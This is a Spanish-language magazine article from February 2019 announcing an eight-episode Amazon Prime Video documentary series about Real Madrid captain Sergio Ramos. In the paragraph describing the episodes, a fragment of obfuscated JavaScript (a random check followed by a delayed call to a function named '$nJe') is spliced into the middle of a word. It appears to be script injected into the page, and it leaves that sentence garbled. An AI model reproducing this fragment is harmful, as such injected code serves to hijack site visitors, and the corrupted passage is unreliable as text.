Sergio Ramos tendrá su propia serie documental en Amazon Prime Video

    Sergio Ramos tendrá su propia serie documental en Amazon Prime Video

    El polémico defensor central y capitán del Real Madrid  y de la Selección española estrenará su propia serie en 2019.

    Autor: Redacción Maxim 5 febrero, 2019


    Fotografía tomada de Instagram.

     

    Sergio Ramos, el capitán del Real Madrid y de la selección española tendrá su propia serie documental en Amazon Prime Video

     

     

    Amazon Prime Video dio a conocer su segundo Prime Original español, se trata de una nueva serie documental sobre Sergio Ramos, defensor central y capitán del Real Madrid  y de la Selección española.

     

    Ramos es uno de los mejores defensores  del mundo, su brillante carrera lo ha convertido en un referente del futbol español a nivel mundial; sus duras entradas lo han puesto en varias ocasiones en el ojo del huracán, sin embargo, nadie puede poner en tela de juicio su calidad en el terreno de juego.

     

     

     

     

     

    La  serie estará compuesta de ocho episodios con duración de media hora cada uno, en estos se relatará la vida diaria de ldel futbolista, mostrandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando las exigencias (dentro y fuera del campo) que se deben cumplir para ser un jugador de élite.

     

     

    via GIPHY

     

     

    Esta producción mostrará un lado nunca antes visto de Ramos, además de sus inicios en Sevilla  y su consolidación como del estrella del conjunto merengue, conoceremos sus valores familiares, sus raíces en Andalucía y su pasión por los tatuajes.

     

     

    A propósito de la serie Ramos comentó:

     

    «Me emociona poder mostrarles a los fanáticos del fútbol lo que se necesita para ser un atleta profesional, la responsabilidad de usar la camiseta del Real Madrid y España y cómo combinarlo con una vida personal normal».

     

     

     

    La serie sobre Ramos se encuentra en producción, sin embargo se tiene previsto su estreno para 2019, como segunda producción española del catálogo de Prime Video, luego de Six Dreams, la cual fue lanzada en julio del 2018.

     

     

    ¿Qué les parece?

     

    via GIPHY

     

     

     

El polémico defensor central y capitán del Real Madrid  y de la Selección española estrenará su propia serie en 2019.